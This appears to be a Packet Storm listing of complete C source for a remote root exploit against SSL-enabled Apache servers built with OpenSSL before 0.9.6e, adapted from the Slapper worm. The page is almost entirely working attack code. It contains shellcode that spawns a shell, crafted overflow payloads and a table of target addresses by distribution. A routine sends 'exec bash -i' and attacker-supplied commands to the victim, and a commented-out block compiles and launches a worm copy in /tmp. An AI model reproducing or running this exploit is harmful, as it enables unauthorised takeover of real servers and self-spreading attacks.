This exploit abuses the KEY_ARG buffer overflow that exists in SSL enabled Apache web servers that are compiled with OpenSSL versions prior to 0.9.6e. The apache-ssl-bug.c exploit is based on the Slapper worm (bugtraq.c), which is based on a early version of the apache-open-ssl exploit.
436090b56a7078c33d435bf10253452623305a3c47e6e5c7f13c05a10118fd8d/*
*
* Linux Apache + OpenSSL exploit
*
* created by andy^ from the bugtraq.c source
*
* compile: gcc -lcrypto -o apache-ssl-bug apache-ssl-bug.c
*
* Option -i specifies the file containing the commands to be
* run on the remote host.
*
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <stdlib.h>
#include <stdarg.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <arpa/telnet.h>
#include <sys/wait.h>
#include <signal.h>
#define SCAN
#undef LARGE_NET
#undef FREEBSD
#define BROADCASTS 2
#define LINKS 128
#define CLIENTS 128
#define PORT 2002
#define SCANPORT 80
#define SCANTIMEOUT 5
#define MAXPATH 4096
#define ESCANPORT 10100
#define VERSION 12092002
//////////////////////////////////////////////////////////////////////////////////////
// Macros //
//////////////////////////////////////////////////////////////////////////////////////
#define FREE(x) {if (x) { free(x);x=NULL; }}
#define DEBUG(x) {if (debug) { printf("DEBUG: %s\n",x); }}
unsigned long numlinks, *links=NULL, myip=0;
unsigned long sequence[LINKS], rsa[LINKS];
unsigned int *pids=NULL;
unsigned long numpids=0;
unsigned long uptime=0, in=0, out=0;
unsigned long synctime=0;
int debug=0;
int port=443;
int arch=-1;
char *filename=NULL;
//////////////////////////////////////////////////////////////////////////////////////
// Public routines //
//////////////////////////////////////////////////////////////////////////////////////
#include <openssl/ssl.h>
#include <openssl/rsa.h>
#include <openssl/x509.h>
#include <openssl/evp.h>
void cleanup(char *buf) {
while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' || buf[strlen(buf)-1] == ' ') buf[strlen(buf)-1] = 0;
while(*buf == '\n' || *buf == '\r' || *buf == ' ') {
unsigned long i;
for (i=strlen(buf)+1;i>0;i--) buf[i-1]=buf[i];
}
}
char *GetAddress(long ip) {
struct sockaddr_in sin;
fd_set fds;
int n,d,sock;
char buf[1024];
struct timeval tv;
sock = socket(PF_INET, SOCK_STREAM, 0);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ip;
sin.sin_port = htons(80);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) return NULL;
write(sock,"GET / HTTP/1.1\r\n\r\n",strlen("GET / HTTP/1.1\r\n\r\n"));
tv.tv_sec = 15;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) < 0) return NULL;
for (d=0;d<n;d++) if (!strncmp(buf+d,"Server: ",strlen("Server: "))) {
char *start=buf+d+strlen("Server: ");
for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
cleanup(start);
return strdup(start);
}
}
}
return NULL;
}
int writem(int sock, char *str) {
return write(sock,str,strlen(str));
}
char readbuf[1025];
int readm(int sock) {
bzero(readbuf,sizeof(readbuf));
return read(sock,readbuf,1024);
}
#define MAX_ARCH 21
struct archs {
char *os;
char *apache;
int func_addr;
} architectures[] = {
{"Gentoo", "", 0x08086c34},
{"Debian", "1.3.26", 0x080863cc},
{"Red-Hat", "1.3.6", 0x080707ec},
{"Red-Hat", "1.3.9", 0x0808ccc4},
{"Red-Hat", "1.3.12", 0x0808f614},
{"Red-Hat", "1.3.12", 0x0809251c},
{"Red-Hat", "1.3.19", 0x0809af8c},
{"Red-Hat", "1.3.20", 0x080994d4},
{"Red-Hat", "1.3.26", 0x08161c14},
{"Red-Hat", "1.3.23", 0x0808528c},
{"Red-Hat", "1.3.22", 0x0808400c},
{"SuSE", "1.3.12", 0x0809f54c},
{"SuSE", "1.3.17", 0x08099984},
{"SuSE", "1.3.19", 0x08099ec8},
{"SuSE", "1.3.20", 0x08099da8},
{"SuSE", "1.3.23", 0x08086168},
{"SuSE", "1.3.23", 0x080861c8},
{"Mandrake", "1.3.14", 0x0809d6c4},
{"Mandrake", "1.3.19", 0x0809ea98},
{"Mandrake", "1.3.20", 0x0809e97c},
{"Mandrake", "1.3.23", 0x08086580},
{"Slackware", "1.3.26", 0x083d37fc},
{"Slackware", "1.3.26",0x080b2100}
};
extern int errno;
int cipher;
int ciphers;
#define FINDSCKPORTOFS 208 + 12 + 46
unsigned char overwrite_session_id_length[] =
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"\x70\x00\x00\x00";
unsigned char overwrite_next_chunk[] =
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAA"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"AAAA"
"\x01\x00\x00\x00"
"AAAA"
"AAAA"
"AAAA"
"\x00\x00\x00\x00"
"AAAA"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"AAAAAAAA"
"\x00\x00\x00\x00"
"\x11\x00\x00\x00"
"fdfd"
"bkbk"
"\x10\x00\x00\x00"
"\x10\x00\x00\x00"
"\xeb\x0a\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x31\xdb"
"\x89\xe7"
"\x8d\x77\x10"
"\x89\x77\x04"
"\x8d\x4f\x20"
"\x89\x4f\x08"
"\xb3\x10"
"\x89\x19"
"\x31\xc9"
"\xb1\xff"
"\x89\x0f"
"\x51"
"\x31\xc0"
"\xb0\x66"
"\xb3\x07"
"\x89\xf9"
"\xcd\x80"
"\x59"
"\x31\xdb"
"\x39\xd8"
"\x75\x0a"
"\x66\xb8\x12\x34"
"\x66\x39\x46\x02"
"\x74\x02"
"\xe2\xe0"
"\x89\xcb"
"\x31\xc9"
"\xb1\x03"
"\x31\xc0"
"\xb0\x3f"
"\x49"
"\xcd\x80"
"\x41"
"\xe2\xf6"
"\x31\xc9"
"\xf7\xe1"
"\x51"
"\x5b"
"\xb0\xa4"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80";
#define BUFSIZE 16384
#define CHALLENGE_LENGTH 16
#define RC4_KEY_LENGTH 16
#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
#define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2)
typedef struct {
int sock;
unsigned char challenge[CHALLENGE_LENGTH];
unsigned char master_key[RC4_KEY_LENGTH];
unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
int conn_id_length;
unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
X509 *x509;
unsigned char* read_key;
unsigned char* write_key;
RC4_KEY* rc4_read_key;
RC4_KEY* rc4_write_key;
int read_seq;
int write_seq;
int encrypted;
} ssl_conn;
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) exit(-1);
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
int sh(int sockfd) {
char localip[256], rcv[1024];
fd_set rset;
int maxfd, n;
FILE *f;
char s[256];
alarm(3600);
DEBUG("Sending data");
writem(sockfd,"TERM=xterm; export TERM=xterm; exec bash -i\n");
/* writem(sockfd,"rm -rf /tmp/.bugtraq.c;cat > /tmp/.uubugtraq << __eof__;\n");
encode(sockfd);
writem(sockfd,"__eof__\n");
conv(localip,256,myip);
memset(rcv,0,1024);
sprintf(rcv,"/usr/bin/uudecode -o /tmp/.bugtraq.c /tmp/.uubugtraq;gcc -o /tmp/.bugtraq /tmp/.bugtraq.c -lcrypto;/tmp/.bugtraq %s;exit;\n",localip);
writem(sockfd,rcv);*/
if((f=fopen(filename,"rt"))!=NULL){
bzero(s,256);
while(!feof(f)){
if(fgets(s,255,f)){
DEBUG(s);
writem(sockfd,s);
}
}
fclose(f);
}
readm(sockfd);
printf("%s",readbuf);
DEBUG("Data sent");
/* for (;;) {
FD_ZERO(&rset);
FD_SET(sockfd, &rset);
select(sockfd+1, &rset, NULL, NULL, NULL);
if (FD_ISSET(sockfd, &rset))
bzero(rcv,sizeof(rcv));
if ((n = read(sockfd, rcv, sizeof(rcv))) == 0){
return 0;
} else {
printf("%s",rcv);
}
}*/
return 0;
}
int get_local_port(int sock) {
struct sockaddr_in s_in;
unsigned int namelen = sizeof(s_in);
if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) return 1;
return s_in.sin_port;
}
int connect_host(long host, int port) {
struct sockaddr_in s_in;
int sock;
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = host;
s_in.sin_port = htons(port);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) return 1;
alarm(60);
if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) return 1;
alarm(0);
return sock;
}
ssl_conn* ssl_connect_host(long host, int port) {
ssl_conn* ssl;
if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) return NULL;
ssl->encrypted = 0;
ssl->write_seq = 0;
ssl->read_seq = 0;
ssl->sock = connect_host(host, port);
return ssl;
}
char res_buf[30];
int read_data(int sock, unsigned char* buf, int len) {
int l;
int to_read = len;
do {
if ((l = read(sock, buf, to_read)) < 0) return 1;
to_read -= len;
} while (to_read > 0);
return len;
}
int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size) {
int rec_len, padding;
read_data(ssl->sock, buf, 2);
if ((buf[0] & 0x80) == 0) {
rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
read_data(ssl->sock, &buf[2], 1);
padding = (int)buf[2];
}
else {
rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
padding = 0;
}
if ((rec_len <= 0) || (rec_len > buf_size)) return 1;
read_data(ssl->sock, buf, rec_len);
if (ssl->encrypted) {
if (MD5_DIGEST_LENGTH + padding >= rec_len) {
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) return 0;
else return 1;
}
RC4(ssl->rc4_read_key, rec_len, buf, buf);
rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
}
if (buf[0] == SSL2_MT_ERROR) {
if (rec_len != 3) return 1;
else return 0;
}
return rec_len;
}
int send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len) {
unsigned char buf[BUFSIZE];
unsigned char* p;
int tot_len;
MD5_CTX ctx;
int seq;
if (ssl->encrypted) tot_len = rec_len + MD5_DIGEST_LENGTH;
else tot_len = rec_len;
if (2 + tot_len > BUFSIZE) {
DEBUG("sens_ssl_packet: packet larger than BUFSIZE");
return 1;
}
p = buf;
s2n(tot_len, p);
buf[0] = buf[0] | 0x80;
if (ssl->encrypted) {
seq = ntohl(ssl->write_seq);
MD5_Init(&ctx);
MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
MD5_Update(&ctx, rec, rec_len);
MD5_Update(&ctx, &seq, 4);
MD5_Final(p, &ctx);
p+=MD5_DIGEST_LENGTH;
memcpy(p, rec, rec_len);
RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
}
else memcpy(p, rec, rec_len);
send(ssl->sock, buf, 2 + tot_len, 0);
ssl->write_seq++;
return 0;
}
int send_client_hello(ssl_conn *ssl) {
int i;
unsigned char buf[BUFSIZE] =
"\x01"
"\x00\x02"
"\x00\x18"
"\x00\x00"
"\x00\x10"
"\x07\x00\xc0\x05\x00\x80\x03\x00"
"\x80\x01\x00\x80\x08\x00\x80\x06"
"\x00\x40\x04\x00\x80\x02\x00\x80"
"";
for (i = 0; i < CHALLENGE_LENGTH; i++) ssl->challenge[i] = (unsigned char) (rand() >> 24);
memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
if(send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH)) return 1;
return 0;
}
int get_server_hello(ssl_conn* ssl) {
unsigned char buf[BUFSIZE];
unsigned char *p, *end;
int len;
int server_version, cert_length, cs_length, conn_id_length;
int found;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) return 1;
if (len < 11) return 1;
p = buf;
if (*(p++) != SSL2_MT_SERVER_HELLO) return 1;
if (*(p++) != 0) return 1;
if (*(p++) != 1) return 1;
n2s(p, server_version);
if (server_version != 2) return 1;
n2s(p, cert_length);
n2s(p, cs_length);
n2s(p, conn_id_length);
if (len != 11 + cert_length + cs_length + conn_id_length) return 1;
ssl->x509 = NULL;
ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
if (ssl->x509 == NULL) return 1;
if (cs_length % 3 != 0) return 1;
found = 0;
for (end=p+cs_length; p < end; p += 3) if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80)) found = 1;
if (!found) return 1;
if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) return 1;
ssl->conn_id_length = conn_id_length;
memcpy(ssl->conn_id, p, conn_id_length);
return 0;
}
int send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
int encrypted_key_length, key_arg_length, record_length;
unsigned char* p;
int i;
EVP_PKEY *pkey=NULL;
unsigned char buf[BUFSIZE] =
"\x02"
"\x01\x00\x80"
"\x00\x00"
"\x00\x40"
"\x00\x08";
p = &buf[10];
for (i = 0; i < RC4_KEY_LENGTH; i++) ssl->master_key[i] = (unsigned char) (rand() >> 24);
pkey=X509_get_pubkey(ssl->x509);
if (!pkey) return 1;
if (pkey->type != EVP_PKEY_RSA) return 1;
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
if (encrypted_key_length <= 0) return 1;
p += encrypted_key_length;
if (key_arg_overwrite) {
for (i = 0; i < 8; i++) *(p++) = (unsigned char) (rand() >> 24);
memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
key_arg_length = 8 + key_arg_overwrite_len;
}
else key_arg_length = 0;
p = &buf[6];
s2n(encrypted_key_length, p);
s2n(key_arg_length, p);
record_length = 10 + encrypted_key_length + key_arg_length;
if(send_ssl_packet(ssl, buf, record_length)) return 1;
ssl->encrypted = 1;
return 0;
}
void generate_key_material(ssl_conn* ssl) {
unsigned int i;
MD5_CTX ctx;
unsigned char *km;
unsigned char c='0';
km=ssl->key_material;
for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
MD5_Init(&ctx);
MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
MD5_Update(&ctx,&c,1);
c++;
MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
MD5_Final(km,&ctx);
km+=MD5_DIGEST_LENGTH;
}
}
void generate_session_keys(ssl_conn* ssl) {
generate_key_material(ssl);
ssl->read_key = &(ssl->key_material[0]);
ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
}
int get_server_verify(ssl_conn* ssl) {
unsigned char buf[BUFSIZE];
int len;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) return 1;
if (len != 1 + CHALLENGE_LENGTH) return 1;
if (buf[0] != SSL2_MT_SERVER_VERIFY) return 1;
if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) return 1;
return 0;
}
int send_client_finished(ssl_conn* ssl) {
unsigned char buf[BUFSIZE];
buf[0] = SSL2_MT_CLIENT_FINISHED;
memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
if(send_ssl_packet(ssl, buf, 1+ssl->conn_id_length)) return 1;
return 0;
}
int get_server_finished(ssl_conn* ssl) {
unsigned char buf[BUFSIZE];
int len;
int i;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) return 1;
if (buf[0] != SSL2_MT_SERVER_FINISHED) return 1;
if (len <= 112) return 1;
cipher = *(int*)&buf[101];
ciphers = *(int*)&buf[109];
return 0;
}
int get_server_error(ssl_conn* ssl) {
unsigned char buf[BUFSIZE];
int len;
if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) return 1;
return 0;
}
int exploit(long ip) {
int i;
int N = 20;
ssl_conn* ssl1;
ssl_conn* ssl2;
char *a;
alarm(3600);
if ((a=GetAddress(ip)) == NULL){
printf("Could not connect\n");
return 1;
}
if ( (arch == -1) || (arch >= MAX_ARCH) ){
DEBUG("Checking version");
if (strncmp(a,"Apache",6)){
printf("The web server is not Apache\n\n");
return 1;
}
for (i=0;i<MAX_ARCH;i++) {
if (strstr(a,architectures[i].apache) && strstr(a,architectures[i].os)) {
arch=i;
break;
}
}
} else {
i=arch;
}
if (arch == -1) arch=9;
printf("Selected architecture: %s Apache %s (%d)\n",architectures[i].os,architectures[i].apache,arch);
srand(0x31337);
DEBUG("Creating 20 dummy connections");
for (i=0; i<N; i++) {
connect_host(ip, port);
usleep(100000);
}
DEBUG("connected");
DEBUG("ssl_connect_host");
if((ssl1 = ssl_connect_host(ip, port)) == NULL){
DEBUG("could not connect ssl1");
return 1;
}
DEBUG("ssl_connect_host");
if((ssl2 = ssl_connect_host(ip, port)) == NULL){
DEBUG("could not connect ssl2");
return 1;
}
DEBUG("send_client_hello");
send_client_hello(ssl1);
DEBUG("get_server_hello");
if(get_server_hello(ssl1)) return 1;
DEBUG("send_client_master_key");
if(send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1)) return 1;
DEBUG("generate_session_keys");
generate_session_keys(ssl1);
DEBUG("get_server_verify");
if(get_server_verify(ssl1)) return 1;
DEBUG("send_client_finished");
if(send_client_finished(ssl1)) return 1;
DEBUG("get_server_finished");
if(get_server_finished(ssl1)) return 1;
DEBUG("get_local_port");
port = get_local_port(ssl2->sock);
DEBUG("overwrite_next_chunk");
overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
DEBUG("overwrite_next_chunk");
overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
*(int*)&overwrite_next_chunk[156] = cipher;
*(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
*(int*)&overwrite_next_chunk[196] = ciphers + 16;
DEBUG("send_client_hello");
send_client_hello(ssl2);
DEBUG("get_server_hello");
if(get_server_hello(ssl2)) return 1;
DEBUG("send_client_master_key");
if(send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1)) return 1;
DEBUG("generate_session_keys");
generate_session_keys(ssl2);
DEBUG("get_server_verify");
if(get_server_verify(ssl2)) return 1;
for (i = 0; i < ssl2->conn_id_length; i++) ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
DEBUG("send_client_finished");
if(send_client_finished(ssl2)) return 1;
DEBUG("get_server_error");
if(get_server_error(ssl2)) return 1;
DEBUG("sh");
sh(ssl2->sock);
DEBUG("close");
close(ssl2->sock);
close(ssl1->sock);
return 0;
}
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
int main(int argc, char **argv) {
struct hostent *he;
int i=0,c;
struct in_addr in;
printf("\nApache & OpenSSL 0.9.6 Exploit\nMade by andy^ after the bugtraq.c worm\n\n");
if(argc<2){
printf("Syntax: %s [options] host\n\n",argv[0]);
printf("Options:\n\n");
printf("\t-p port\t\tport to connect (default 443)\n");
printf("\t-v\t\tverbose\n");
printf("\t-i file\t\tinput file (default ssl2.txt)\n");
printf("\t-t target\ttarget\n");
printf("\t\t\t\t0\tAutodetect\n");
for(i=0;i<MAX_ARCH;i++){
printf("\t\t\t\t%d\t%s %s\n",i+1,architectures[i].os,architectures[i].apache);
}
exit(1);
}
opterr=0;
while(1){
c=getopt(argc,argv,":p:vi:t:");
if(c==-1) break;
switch(c){
case 'p':
port=atoi(optarg);
break;
case 'v':
debug=1;
break;
case 'i':
if((filename=strdup(optarg))==NULL){
perror("strdup");
return 1;
}
break;
case 't':
arch=atoi(optarg)-1;
break;
case ':':
printf("Missing argument for -%c\n",optopt);
exit(1);
break;
}
}
if(filename==NULL){
if((filename=strdup("ssl2.c"))==NULL){
perror("strdup");
return 1;
}
}
if(optind >=argc ){
printf("No hostname specified\n\n");
return 1;
}
uptime=time(NULL);
srand(time(NULL)^getpid());
if( (he=gethostbyname(argv[optind])) == NULL ){
perror("gethostbyname");
return 1;
}
while(he->h_addr_list[i]){
memcpy(&in.s_addr,he->h_addr_list[i],4);
printf("Trying to exploit %s\n",inet_ntoa(in));
if(exploit(in.s_addr)==0){
printf("DONE\n");
return 0;
} else {
printf("FAILED\n");
return 1;
}
i++;
}
if(filename) free(filename);
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed